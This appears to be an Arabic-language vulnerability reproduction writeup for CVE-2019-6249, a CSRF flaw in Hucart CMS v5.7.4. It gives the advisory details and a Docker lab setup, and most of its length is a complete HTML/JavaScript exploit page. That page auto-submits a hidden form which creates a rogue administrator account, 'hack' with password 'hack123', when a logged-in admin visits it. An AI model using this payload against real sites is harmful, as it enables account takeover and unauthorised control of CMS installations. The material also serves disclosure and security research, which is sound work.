
CVE-2019-6249 Hucart cms بيئة إعادة الإنتاج
اسم الثغرة: ثغرة CSRF في Hucart cms v5.7.4 تسمح بإضافة حساب مدير بشكل تعسفي
تاريخ الإبلاغ: 2019-01-13
مكتشف الثغرة: AllenChen ([email protected])
الصفحة الرئيسية للمنتج: http://www.hucart.com/
رابط البرنامج: http://www.hucart.com/
الإصدار: v5.7.4
رقم CVE: CVE-2019-6249\
يوجد ثغرة CSRF في الإصدار v5.7.4 من Hucart cms، حيث يمكن للمدير بعد تسجيل الدخول زيارة صفحة اختبار CSRF التالية لإضافة حساب مدير باسم hack.
كود الاستغلال كما يلي: يضيف حساب مدير باسم hack وكلمة مرور hack123.
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='[email protected]' />";
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";
fields += "<input type='hidden' name='adm_enabled' value='1' />";
fields += "<input type='hidden' name='act_type' value='add' />";
fields += "<input type='hidden' name='adm_id' value='' />";
var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
في بيئة Docker، قم بتشغيل الأوامر التالية
docker built -t hucart -f Dockerfile .
docker run -d -p 80:80 hucart